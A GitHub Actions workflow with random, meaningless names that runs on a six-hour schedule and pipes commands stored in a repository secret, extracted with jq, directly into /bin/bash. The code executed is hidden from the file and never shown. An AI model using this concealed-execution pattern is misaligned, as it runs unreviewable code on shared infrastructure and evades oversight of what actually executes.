name: xiaoyutou3876
on:
  workflow_dispatch:
  schedule:
    - cron: '4 2/6 * * *'

jobs:  # 11921
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiaoyutou3876
        env:
          gemx10: ${{ secrets.gemx10 }}
        run: |
          echo $gemx10 | jq -r .tpums0 | /bin/bash
          echo $btjsj167 | jq -r .u3 | /bin/bash
          echo $ijqnl48 | jq -r .bsbmh402 | /bin/bash

